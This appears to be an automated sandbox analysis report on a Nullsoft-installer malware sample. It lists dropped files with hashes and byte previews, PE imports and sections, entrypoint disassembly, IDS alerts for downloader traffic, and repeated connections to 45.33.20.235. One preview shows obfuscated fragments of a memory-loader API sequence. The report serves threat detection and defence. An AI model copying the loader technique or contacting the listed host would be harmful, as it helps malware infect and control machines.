File Type:	data
Category:	dropped
Size (bytes):	311990
Entropy (8bit):	7.519918348900494
Encrypted:	false
SSDEEP:	6144:I10DAfUp1X6EIirpvb8OvqC/aStmDUaqHUgJIMz+7ssgZn1yN6ft:ISpdIirpvwOFahDU/IMz+7s/oi
MD5:	2207F498823208A0687256F9149A04E3
SHA1:	4611FA8AADACBDFEA00845D0F8BAF9315B9E04F0
SHA-256:	41F1D6C7B94F3636B10E2911CCFD0B29E85FE4A8B0B24BAB3C1ED1F9B11F7B62
SHA-512:	FC015E8CD4902D75061E5EAC1364B3F78A6D6AC2563EC9B7EB2EB1E054F528DE18AA6539AF529D1744AB497290C4171D94D3C44FC2341BB76E06D8F78DE1F833
Malicious:	false
Reputation:	low
Preview:	... ..............UUUU............???.......jj.yy.=.44.........SS.......y..............".............}........444.........[[.s.............y...tttt.....................Z.~............^^^..........................F..v......D.....................a......t....%....==.......l.....77.C..cc..........ddd......hhhhhhh.................................../........I........ ...........................F.m......z.............u.``...........\\........ ..............C..................%%%.IIIII.xxx..ZZZZZ........\.......,,...*...{{........SS.........}....^..F...<.0.s...\.........ccc...{{....?.....t..QQ........=.Z..........r......PPPP..............&&.............{{{{..%%...............;;;;;.::.......)...QQ............"................QQ........!....B..............F....................PP.........................y.............."""....................a........yyy.KK............((....A....................KKK..............r.........z.......................>>>>....-...P..........AA......zzzz............

C:\Users\user\AppData\Roaming\lsrivelserne\Mommies\svindelen\Udrmmes\Sysselsttelser.Dry

Download File

Process:	C:\Users\user\Desktop\5WP9WCM8qV.exe
File Type:	GTA audio index data (SDT)
Category:	dropped
Size (bytes):	12235
Entropy (8bit):	4.572701327859005
Encrypted:	false
SSDEEP:	192:dgdGeuhAlLzD/84n7aYQf5eSRWyv73fyqbM1uYrgceaQM/:dgdGeuhA9/iY45eSRWo73fyqb8uYr00
MD5:	BF5C38D150E1B8D25560034E5623D83C
SHA1:	F538E35AED4F6893F3F5F5BD1230B0A2F9EE5A97
SHA-256:	6DD426B7167D273258442F339AC082FE1BFB479B48C1DD3716E17294B346C929
SHA-512:	CD96D8C3B4958FCF3DB75DE73B757C8B3227664F6251727BFA8E71AB0F6D69722752A38DF5450A6358BC19BAE6D04D200112387DC36A85BEF150756DD184D76F
Malicious:	false
Preview:	.....U......y.......R................8888.............. ............."""".CCCCC....:.&&&......k.B.e...r...n..ie...l...3..O2...:...:...C...r.Z.e...a...t...e...F...i...l...e..(A...(...m... ...r...4... ...,... ...i... ...0.,.x...8...0.NN0...0.>.0...0...0..0...,... ...i... ...0...,.CC .I.p... ...0.LL,.77 ...i... ...4.jj,... ...i... ...0...x...8...0...,... ...i... .=.0..U).\|.i..[....r...8...q...k..pe...r...n...e...l...3...2...:...:...S..De...t.0.F...i...l...e...P...o...i...n...t...e...r...(...i... ...r...8...,... ...i... ...2.."3...0...1...2... ...,... ...i... .GG0...,...i... ...0...)...i......3r...4...q...k...e...r.F.n...e...l...3...2.2.:...:.*V...i...r...t...u...a...l...A...l...l...o...c...(..ei... ...0..b,...i... ...6...0...6...2...0...8..i0...0...,... ..ki... ...0...x.,.3...0...0...0...,.mm ...i... .EE0...x.kk4...0..P)...p.......r...2.Q.q...k...e.5.r...n...e...l...3...2...:...:...R...e...a...d...F...i..ul...e...(...i... ..]r...8...,... .>>i... ...r..B2.<<,... ...i... ..d6...0...6...2

C:\Users\user\AppData\Roaming\lsrivelserne\Mommies\svindelen\Udrmmes\annektere.boa

Download File

Process:	C:\Users\user\Desktop\5WP9WCM8qV.exe
File Type:	data
Category:	dropped
Size (bytes):	422983
Entropy (8bit):	1.2471032907625013
Encrypted:	false
SSDEEP:	1536:5NoutEi8nTdgryYti40QzlN7nJRim3FPbjEkK:5vOi8nTij0Qrz3Fkk
MD5:	5D882E43F04F9E3ECAB75D91513C47C5
SHA1:	C53CDFD7B5C28D4B96BBB113B1930859ADA7503C
SHA-256:	D5388F93E2E8652096A94D0DA440FC30631A454EEFE2B94681339F58B1D215BF
SHA-512:	30D73608445A0F35183BF3E235978773DF6F60D057902E97B4A85CBF20201C9ED31DF3205C22E8BCEB72B8D2CD8F86A05AC5C7F13B7B4886467FE43816879452
Malicious:	false
Preview:	.{..........................R.........[..............................................................................".......................I......................6..................../...................1...................l......................................}.....................................................................o...................................&............2...................}......%..a......................&........................).....................(................l..........................................a..~g'...............#........6...........................................................................................................................o...........{......M........................>.............s.......q......"................................U........................................g..................7.............#.........................<......................................................c...-..Y................................m.

C:\Users\user\AppData\Roaming\lsrivelserne\Mommies\svindelen\Udrmmes\buduma.ves

Download File

Process:	C:\Users\user\Desktop\5WP9WCM8qV.exe
File Type:	data
Category:	dropped
Size (bytes):	271566
Entropy (8bit):	1.260545183044887
Encrypted:	false
SSDEEP:	768:mM2KAo+yjNnNRgJLYCK6FVY60l2W9nu01LDmyNqBEVRhfB8yvEx+PtIr5UXBCtmj:mW+9W11HYURi8LdOge63
MD5:	863FA122F521E238CB0FC11152C29A97
SHA1:	2A21A721B5B84C173CA00D7E7BFB8B48645DE5B6
SHA-256:	A4168D8B8246F976D65448E07F0DC9F99A6A16D8D2586B00555387AD02099DAE
SHA-512:	FCB763392AF39B463B664D842DD86DA8DF75D4FCC7AB9CE846357695E26E8BFE12B5F2E038462737D8B3BA848F62996B9342BCE79E231766C21CC3CCE9D91031
Malicious:	false
Preview:	............4..........................................................l...............Z........!.....n............................;............................f..................................:...!................................................................................................................................................a......................4.....\|..............Y................]..................@............................#.c.....................................Q......._...............................................H..........y.........................7................................6.............................J............................!............$...................................................O..............~................................................................C.................H.......................................\|..................t..........Y.......>.........0......d...;.>.........................,..........%....................

C:\Users\user\AppData\Roaming\lsrivelserne\Mommies\svindelen\Udrmmes\isopodan.txt

Download File

Process:	C:\Users\user\Desktop\5WP9WCM8qV.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	529
Entropy (8bit):	4.22369333189341
Encrypted:	false
SSDEEP:	12:UzadHNcuAGwIvUKMp9iRpCpadVf3ZWqKU7jFz9W8:UoHNcuq1U0pU3a8
MD5:	B6F5DF9A099D85E8EF9CB11317AB4467
SHA1:	3AA33AFE232E6F00608AE69A84E0C308B62E2EA2
SHA-256:	05DE4CFDF5C4F833D2D5A2931B9719F22912D50485BDF8AF3206B53037A43999
SHA-512:	3164AB5E6D8CE8E97C03424776D1236535D6B7717AB2C6CC25D718AE62FE3BB57A9B998AA3412ADA044812BA45A809E9873A069ED61F6689AFAFC34894ECFB34
Malicious:	false
Preview:	udsyr idiotismens befolkningsgrundlaget aarsfesternes brachyceral stannoxyl,reabsorbed kokkenes lediggngere appellatory underldige latiner.kegling perfidt kommandosttets crossgrainedness indviklingen stabilitate modn selvrespektens recompenses terkils..fattigdomsdebatten oxidising astilbe preeconomically betastraalernes.socialpensioner sagsbehandlernes chromophilous nondenial belle stemmesamleren,kampestens nonbotanic accession romdisk udslukkende twinemaking becalm udlggerne centrifugalization hottentotese lkasses secern..

C:\Users\user\AppData\Roaming\lsrivelserne\Mommies\svindelen\Udrmmes\sludredes.peb

Download File

Process:	C:\Users\user\Desktop\5WP9WCM8qV.exe
File Type:	DIY-Thermocam raw data (Lepton 3.x), scale 129-0, spot sensor temperature 0.000000, unit celsius, color scheme 0, calibration: offset 0.000000, slope 36028797018963968.000000
Category:	dropped
Size (bytes):	258325
Entropy (8bit):	1.2557915582426904
Encrypted:	false
SSDEEP:	768:qE8odS4zheB8ZZDhlEIxdZCtzYpGByaaQasESD+VqOe9VniXR4zSlMfWblqRfE6n:5t2D72hR5qRfE+W/IIjWgu
MD5:	27D252AAC87023B3333B038C8366D683
SHA1:	2F443415B95254A1DB926304565FC76A59CF848C
SHA-256:	3719E64CA180AFC5C303E7DAFE26A80359FE8BC3E0C472A822EC7D0847D70252
SHA-512:	C523F2A23C27A782A830486352EA0BDE565AD802B22FFE67B05E91B1EA7B4ECD1DADFE19635C403D86932EC1102240209AB9C6EBDE02F065948D1AC09D9B0C73
Malicious:	false
Preview:	.............................................................2.....x..................)................................................5..g.............f....)........$...............................]............p.............................F........................................&............................%.........................?....................3............H...........................................................=........................................T...........................!......................................................L.......................................................p.............L....................................................................../................,............}.....P0.....].....................v....Y...............................m*............................%..[...................d.................6................1.........................................c....... ...........'.<...............................<............J....

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
Entropy (8bit):	7.914141801533325
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	5WP9WCM8qV.exe
File size:	538'129 bytes
MD5:	649ba11fd51e50393b1cf0f461b90cbf
SHA1:	99dc18ad322a073c6e17e5c129832f85f2092b6c
SHA256:	950a25a2f21613cae69f796f6a3eeab57f92b711afb746dfeafefa00d5bfad55
SHA512:	b7e0034c8813484192d3a77c0e5ef8a80ca1200aeed85444327c8433e25807c5bd16afc38400b9ff7138480af457fd4bb7c967d24839930e9c392ff2e94be305
SSDEEP:	12288:/5K4KY7IAEmMsA/LUMyv+8T59Dgco9yHtdIaLDjnm:84T0GMs1m8T59D0QIaLDjn
TLSH:	CDB42341F545C126E8623F3818B7DE658F98EE245932DB0B67063B29ABB30C1EF57352
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...P...P...P.._...P...P..NP.._...P...s...P...V...P..Rich.P..........................PE..L......V.................d.........

File Icon


Icon Hash:	65e4b2bfb5bfb3ff

Static PE Info

General

Entrypoint:	0x4032a0
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x567F847F [Sun Dec 27 06:26:07 2015 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	d4b94e8ee3f620a89d114b9da4b31873

Entrypoint Preview

Instruction
sub esp, 000002D4h
push ebp
push esi
push 00000020h
xor ebp, ebp
pop esi
mov dword ptr [esp+0Ch], ebp
push 00008001h
mov dword ptr [esp+0Ch], 0040A300h
mov dword ptr [esp+18h], ebp
call dword ptr [004080B0h]
call dword ptr [004080ACh]
cmp ax, 00000006h
je 00007F7A713EF823h
push ebp
call 00007F7A713F2966h
cmp eax, ebp
je 00007F7A713EF819h
push 00000C00h
call eax
push ebx
push edi
push 0040A2F4h
call 00007F7A713F28E3h
push 0040A2ECh
call 00007F7A713F28D9h
push 0040A2E0h
call 00007F7A713F28CFh
push 00000009h
call 00007F7A713F2934h
push 00000007h
call 00007F7A713F292Dh
mov dword ptr [00434F04h], eax
call dword ptr [00408044h]
push ebp
call dword ptr [004082A8h]
mov dword ptr [00434FB8h], eax
push ebp
lea eax, dword ptr [esp+34h]
push 000002B4h
push eax
push ebp
push 0042B228h
call dword ptr [0040818Ch]
push 0040A2C8h
push 00433F00h
call 00007F7A713F251Ah
call dword ptr [004080A8h]
mov ebx, 0043F000h
push eax
push ebx
call 00007F7A713F2508h
push ebp
call dword ptr [00408178h]

Rich Headers

Programming Language:

[EXP] VC++ 6.0 SP5 build 8804

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x85c8	0xa0	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x5c000	0x7590	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x8000	0x2b8	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x637c	0x6400	83ff228d6dae8dd738eb2f78afbc793f	False	0.672421875	data	6.491609540807675	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x8000	0x147c	0x1600	d9f9b0b330e238260616b62a7a3cac09	False	0.42933238636363635	data	4.973928345594701	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0xa000	0x2aff8	0x600	3f2b05c8fbb8b2e4c9c89e93d30e7252	False	0.53125	data	4.133631086111171	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.ndata	0x35000	0x27000	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x5c000	0x7590	0x7600	a6c18742ec2824937e7f2b24615a720b	False	0.3500066207627119	data	5.1863956934511295	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_ICON	0x5c310	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9600	English	United States	0.329149377593361
RT_ICON	0x5e8b8	0x1ca8	Device independent bitmap graphic, 48 x 96 x 24, image size 7296	English	United States	0.35659760087241005
RT_ICON	0x60560	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4224	English	United States	0.37640712945590993
RT_ICON	0x61608	0xca8	Device independent bitmap graphic, 32 x 64 x 24, image size 3200	English	United States	0.4305555555555556
RT_ICON	0x622b0	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1088	English	United States	0.4379432624113475
RT_ICON	0x62718	0x368	Device independent bitmap graphic, 16 x 32 x 24, image size 832	English	United States	0.4873853211009174
RT_ICON	0x62a80	0x2e8	Device independent bitmap graphic, 32 x 64 x 4, image size 640	English	United States	0.24865591397849462
RT_ICON	0x62d68	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 192	English	United States	0.38175675675675674
RT_DIALOG	0x62e90	0x100	data	English	United States	0.5234375
RT_DIALOG	0x62f90	0x11c	data	English	United States	0.6056338028169014
RT_DIALOG	0x630b0	0xc4	data	English	United States	0.5918367346938775
RT_DIALOG	0x63178	0x60	data	English	United States	0.7291666666666666
RT_GROUP_ICON	0x631d8	0x76	data	English	United States	0.6610169491525424
RT_MANIFEST	0x63250	0x33f	XML 1.0 document, ASCII text, with very long lines (831), with no line terminators	English	United States	0.5547533092659447

Imports

DLL	Import
KERNEL32.dll	SetCurrentDirectoryW, GetFileAttributesW, GetFullPathNameW, Sleep, GetTickCount, GetFileSize, GetModuleFileNameW, MoveFileW, SetFileAttributesW, GetCurrentProcess, ExitProcess, SetEnvironmentVariableW, GetWindowsDirectoryW, GetTempPathW, GetCommandLineW, GetVersion, SetErrorMode, lstrlenW, lstrcpynW, CopyFileW, CompareFileTime, GlobalLock, CreateThread, GetLastError, CreateDirectoryW, CreateProcessW, RemoveDirectoryW, lstrcmpiA, CreateFileW, GetTempFileNameW, WriteFile, lstrcpyA, lstrcpyW, MoveFileExW, lstrcatW, GetSystemDirectoryW, LoadLibraryW, GetProcAddress, GetModuleHandleA, ExpandEnvironmentStringsW, GetShortPathNameW, SearchPathW, lstrcmpiW, SetFileTime, CloseHandle, GlobalFree, lstrcmpW, GlobalAlloc, WaitForSingleObject, GlobalUnlock, GetDiskFreeSpaceW, GetExitCodeProcess, FindFirstFileW, FindNextFileW, DeleteFileW, SetFilePointer, ReadFile, FindClose, MulDiv, MultiByteToWideChar, lstrlenA, WideCharToMultiByte, GetPrivateProfileStringW, WritePrivateProfileStringW, FreeLibrary, LoadLibraryExW, GetModuleHandleW
USER32.dll	GetSystemMenu, SetClassLongW, IsWindowEnabled, EnableMenuItem, SetWindowPos, GetSysColor, GetWindowLongW, SetCursor, LoadCursorW, CheckDlgButton, GetMessagePos, LoadBitmapW, CallWindowProcW, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, OpenClipboard, wsprintfW, ScreenToClient, GetWindowRect, GetSystemMetrics, SetDlgItemTextW, GetDlgItemTextW, MessageBoxIndirectW, CharPrevW, CharNextA, wsprintfA, DispatchMessageW, PeekMessageW, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, EndDialog, RegisterClassW, SystemParametersInfoW, CreateWindowExW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, CreateDialogParamW, GetDC, SetWindowTextW, PostQuitMessage, ShowWindow, GetDlgItem, IsWindow, LoadImageW, SetWindowLongW, TrackPopupMenu, AppendMenuW, CreatePopupMenu, EndPaint, SetTimer, FindWindowExW, SendMessageTimeoutW, SetForegroundWindow
GDI32.dll	SelectObject, SetBkMode, CreateFontIndirectW, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor
SHELL32.dll	SHGetSpecialFolderLocation, SHGetPathFromIDListW, SHBrowseForFolderW, SHGetFileInfoW, ShellExecuteW, SHFileOperationW
ADVAPI32.dll	RegDeleteKeyW, SetFileSecurityW, OpenProcessToken, LookupPrivilegeValueW, AdjustTokenPrivileges, RegOpenKeyExW, RegEnumValueW, RegDeleteValueW, RegCloseKey, RegCreateKeyExW, RegSetValueExW, RegQueryValueExW, RegEnumKeyW
COMCTL32.dll	ImageList_Create, ImageList_AddMasked, ImageList_Destroy
ole32.dll	OleUninitialize, OleInitialize, CoTaskMemFree, CoCreateInstance

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-11-05T16:13:44.632588+0100	2022930	ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow	1	4.175.87.197	443	192.168.2.8	49706	TCP
2024-11-05T16:13:48.306164+0100	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.8	49708	45.33.20.235	80	TCP
2024-11-05T16:13:58.967249+0100	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.8	49709	45.33.20.235	80	TCP
2024-11-05T16:14:09.808561+0100	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.8	49710	45.33.20.235	80	TCP
2024-11-05T16:14:20.444838+0100	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.8	49711	45.33.20.235	80	TCP
2024-11-05T16:14:23.191975+0100	2022930	ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow	1	4.175.87.197	443	192.168.2.8	49712	TCP
2024-11-05T16:14:31.080249+0100	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.8	49713	45.33.20.235	80	TCP
2024-11-05T16:14:41.699854+0100	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.8	49714	45.33.20.235	80	TCP
2024-11-05T16:14:52.317635+0100	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.8	49715	45.33.20.235	80	TCP
2024-11-05T16:15:02.954283+0100	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.8	49716	45.33.20.235	80	TCP
2024-11-05T16:15:13.564833+0100	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.8	49717	45.33.20.235	80	TCP
2024-11-05T16:15:24.173235+0100	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.8	49718	45.33.20.235	80	TCP
2024-11-05T16:15:34.802466+0100	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.8	49719	45.33.20.235	80	TCP
2024-11-05T16:15:45.435578+0100	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.8	49720	45.33.20.235	80	TCP
2024-11-05T16:15:56.075437+0100	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.8	49721	45.33.20.235	80	TCP
2024-11-05T16:16:06.684759+0100	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.8	49722	45.33.20.235	80	TCP
2024-11-05T16:16:17.305113+0100	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.8	49723	45.33.20.235	80	TCP
2024-11-05T16:16:27.980874+0100	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.8	49724	45.33.20.235	80	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 5, 2024 16:13:46.981220961 CET	49708	80	192.168.2.8	45.33.20.235
Nov 5, 2024 16:13:46.986236095 CET	80	49708	45.33.20.235	192.168.2.8
Nov 5, 2024 16:13:46.986319065 CET	49708	80	192.168.2.8	45.33.20.235
Nov 5, 2024 16:13:46.988059998 CET	49708	80	192.168.2.8	45.33.20.235
Nov 5, 2024 16:13:46.993350029 CET	80	49708	45.33.20.235	192.168.2.8
Nov 5, 2024 16:13:48.306051016 CET	80	49708	45.33.20.235	192.168.2.8
Nov 5, 2024 16:13:48.306066990 CET	80	49708	45.33.20.235	192.168.2.8
Nov 5, 2024 16:13:48.306086063 CET	80	49708	45.33.20.235	192.168.2.8
Nov 5, 2024 16:13:48.306164026 CET	49708	80	192.168.2.8	45.33.20.235
Nov 5, 2024 16:13:48.306204081 CET	49708	80	192.168.2.8	45.33.20.235
Nov 5, 2024 16:13:48.306320906 CET	49708	80	192.168.2.8	45.33.20.235
Nov 5, 2024 16:13:48.306562901 CET	80	49708	45.33.20.235	192.168.2.8
Nov 5, 2024 16:13:48.306612015 CET	49708	80	192.168.2.8	45.33.20.235
Nov 5, 2024 16:13:48.306689024 CET	80	49708	45.33.20.235	192.168.2.8
Nov 5, 2024 16:13:48.306727886 CET	49708	80	192.168.2.8	45.33.20.235
Nov 5, 2024 16:13:48.311837912 CET	80	49708	45.33.20.235	192.168.2.8
Nov 5, 2024 16:13:58.320235968 CET	49709	80	192.168.2.8	45.33.20.235
Nov 5, 2024 16:13:58.325133085 CET	80	49709	45.33.20.235	192.168.2.8
Nov 5, 2024 16:13:58.325371027 CET	49709	80	192.168.2.8	45.33.20.235
Nov 5, 2024 16:13:58.325544119 CET	49709	80	192.168.2.8	45.33.20.235
Nov 5, 2024 16:13:58.330424070 CET	80	49709	45.33.20.235	192.168.2.8
Nov 5, 2024 16:13:58.967118979 CET	80	49709	45.33.20.235	192.168.2.8
Nov 5, 2024 16:13:58.967200041 CET	80	49709	45.33.20.235	192.168.2.8
Nov 5, 2024 16:13:58.967248917 CET	49709	80	192.168.2.8	45.33.20.235
Nov 5, 2024 16:13:58.967286110 CET	49709	80	192.168.2.8	45.33.20.235
Nov 5, 2024 16:13:58.967345953 CET	80	49709	45.33.20.235	192.168.2.8
Nov 5, 2024 16:13:58.967386961 CET	49709	80	192.168.2.8	45.33.20.235
Nov 5, 2024 16:13:58.967421055 CET	49709	80	192.168.2.8	45.33.20.235
Nov 5, 2024 16:13:58.972781897 CET	80	49709	45.33.20.235	192.168.2.8
Nov 5, 2024 16:14:08.976362944 CET	49710	80	192.168.2.8	45.33.20.235
Nov 5, 2024 16:14:08.983505011 CET	80	49710	45.33.20.235	192.168.2.8
Nov 5, 2024 16:14:08.983611107 CET	49710	80	192.168.2.8	45.33.20.235
Nov 5, 2024 16:14:08.983772039 CET	49710	80	192.168.2.8	45.33.20.235
Nov 5, 2024 16:14:08.989321947 CET	80	49710	45.33.20.235	192.168.2.8
Nov 5, 2024 16:14:09.808445930 CET	80	49710	45.33.20.235	192.168.2.8
Nov 5, 2024 16:14:09.808546066 CET	80	49710	45.33.20.235	192.168.2.8
Nov 5, 2024 16:14:09.808557034 CET	80	49710	45.33.20.235	192.168.2.8
Nov 5, 2024 16:14:09.808561087 CET	49710	80	192.168.2.8	45.33.20.235
Nov 5, 2024 16:14:09.808594942 CET	49710	80	192.168.2.8	45.33.20.235
Nov 5, 2024 16:14:09.808614016 CET	49710	80	192.168.2.8	45.33.20.235
Nov 5, 2024 16:14:09.808631897 CET	49710	80	192.168.2.8	45.33.20.235
Nov 5, 2024 16:14:09.813682079 CET	80	49710	45.33.20.235	192.168.2.8
Nov 5, 2024 16:14:19.820267916 CET	49711	80	192.168.2.8	45.33.20.235
Nov 5, 2024 16:14:19.830694914 CET	80	49711	45.33.20.235	192.168.2.8
Nov 5, 2024 16:14:19.830821991 CET	49711	80	192.168.2.8	45.33.20.235
Nov 5, 2024 16:14:19.830996990 CET	49711	80	192.168.2.8	45.33.20.235
Nov 5, 2024 16:14:19.841901064 CET	80	49711	45.33.20.235	192.168.2.8
Nov 5, 2024 16:14:20.444678068 CET	80	49711	45.33.20.235	192.168.2.8
Nov 5, 2024 16:14:20.444838047 CET	49711	80	192.168.2.8	45.33.20.235
Nov 5, 2024 16:14:20.444931030 CET	49711	80	192.168.2.8	45.33.20.235
Nov 5, 2024 16:14:20.445852041 CET	80	49711	45.33.20.235	192.168.2.8
Nov 5, 2024 16:14:20.445941925 CET	49711	80	192.168.2.8	45.33.20.235
Nov 5, 2024 16:14:20.449781895 CET	80	49711	45.33.20.235	192.168.2.8
Nov 5, 2024 16:14:30.461393118 CET	49713	80	192.168.2.8	45.33.20.235
Nov 5, 2024 16:14:30.466489077 CET	80	49713	45.33.20.235	192.168.2.8
Nov 5, 2024 16:14:30.466592073 CET	49713	80	192.168.2.8	45.33.20.235
Nov 5, 2024 16:14:30.466727972 CET	49713	80	192.168.2.8	45.33.20.235
Nov 5, 2024 16:14:30.472239017 CET	80	49713	45.33.20.235	192.168.2.8
Nov 5, 2024 16:14:31.080193996 CET	80	49713	45.33.20.235	192.168.2.8
Nov 5, 2024 16:14:31.080249071 CET	49713	80	192.168.2.8	45.33.20.235
Nov 5, 2024 16:14:31.080787897 CET	49713	80	192.168.2.8	45.33.20.235
Nov 5, 2024 16:14:31.081741095 CET	80	49713	45.33.20.235	192.168.2.8
Nov 5, 2024 16:14:31.081787109 CET	49713	80	192.168.2.8	45.33.20.235
Nov 5, 2024 16:14:31.085983992 CET	80	49713	45.33.20.235	192.168.2.8
Nov 5, 2024 16:14:41.087842941 CET	49714	80	192.168.2.8	45.33.20.235
Nov 5, 2024 16:14:41.092839003 CET	80	49714	45.33.20.235	192.168.2.8
Nov 5, 2024 16:14:41.092941999 CET	49714	80	192.168.2.8	45.33.20.235
Nov 5, 2024 16:14:41.093044043 CET	49714	80	192.168.2.8	45.33.20.235
Nov 5, 2024 16:14:41.097853899 CET	80	49714	45.33.20.235	192.168.2.8
Nov 5, 2024 16:14:41.699768066 CET	80	49714	45.33.20.235	192.168.2.8
Nov 5, 2024 16:14:41.699853897 CET	49714	80	192.168.2.8	45.33.20.235
Nov 5, 2024 16:14:41.700011969 CET	49714	80	192.168.2.8	45.33.20.235
Nov 5, 2024 16:14:41.702310085 CET	80	49714	45.33.20.235	192.168.2.8
Nov 5, 2024 16:14:41.702621937 CET	49714	80	192.168.2.8	45.33.20.235
Nov 5, 2024 16:14:41.705229044 CET	80	49714	45.33.20.235	192.168.2.8
Nov 5, 2024 16:14:51.711560011 CET	49715	80	192.168.2.8	45.33.20.235
Nov 5, 2024 16:14:51.716744900 CET	80	49715	45.33.20.235	192.168.2.8
Nov 5, 2024 16:14:51.716864109 CET	49715	80	192.168.2.8	45.33.20.235
Nov 5, 2024 16:14:51.717046022 CET	49715	80	192.168.2.8	45.33.20.235
Nov 5, 2024 16:14:51.722779989 CET	80	49715	45.33.20.235	192.168.2.8
Nov 5, 2024 16:14:52.317378998 CET	80	49715	45.33.20.235	192.168.2.8
Nov 5, 2024 16:14:52.317635059 CET	49715	80	192.168.2.8	45.33.20.235
Nov 5, 2024 16:14:52.318628073 CET	80	49715	45.33.20.235	192.168.2.8
Nov 5, 2024 16:14:52.318705082 CET	49715	80	192.168.2.8	45.33.20.235
Nov 5, 2024 16:14:52.331423998 CET	49715	80	192.168.2.8	45.33.20.235
Nov 5, 2024 16:14:52.336246967 CET	80	49715	45.33.20.235	192.168.2.8
Nov 5, 2024 16:15:02.337157011 CET	49716	80	192.168.2.8	45.33.20.235
Nov 5, 2024 16:15:02.342140913 CET	80	49716	45.33.20.235	192.168.2.8
Nov 5, 2024 16:15:02.342226028 CET	49716	80	192.168.2.8	45.33.20.235
Nov 5, 2024 16:15:02.342324972 CET	49716	80	192.168.2.8	45.33.20.235
Nov 5, 2024 16:15:02.348427057 CET	80	49716	45.33.20.235	192.168.2.8
Nov 5, 2024 16:15:02.954221010 CET	80	49716	45.33.20.235	192.168.2.8
